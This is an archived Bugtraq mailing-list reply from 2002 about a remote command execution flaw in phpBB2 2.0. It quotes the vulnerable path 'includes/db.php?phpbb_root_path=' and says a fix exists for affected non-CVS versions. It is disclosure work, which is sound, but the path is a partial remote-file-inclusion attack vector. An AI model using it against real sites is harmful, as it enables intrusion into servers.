Home page logo

bugtraq logo Bugtraq mailing list archives

Re: phpBB2 remote execution command (fwd)
From: Jose Romeo Vela <jrvela () aristasol com>
Date: Mon, 18 Mar 2002 20:17:42 -0500 (EST)

--- nullbyte <nullbyte () inetd-secure net> wrote:
phpBB2 is vulnerable to remote execution command

All *nix running phpBB2 versoion 2.0.

Bug could be found at "phpBB2 root path" which is allowed remote
to execute any command remotely.
The vulnerability of this attack start with
'/phpBB2/includes/db.php?phpbb_root_path=' but some backdoor server
are needed to launch the attack.

I did not look further into this bug.
It is tested on most *nix systems running phpBB2 version 2.0.
Probably all

Bug was found by pokley and nullbyte

nullbyte () inetd-secure net

This bug only affects non-CVS versions. There is a fix available. For
details see:


Jose Romeo Vela
jrvela () aristasol com

  By Date           By Thread  

Current thread:
  • Re: phpBB2 remote execution command (fwd) Jose Romeo Vela (Mar 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]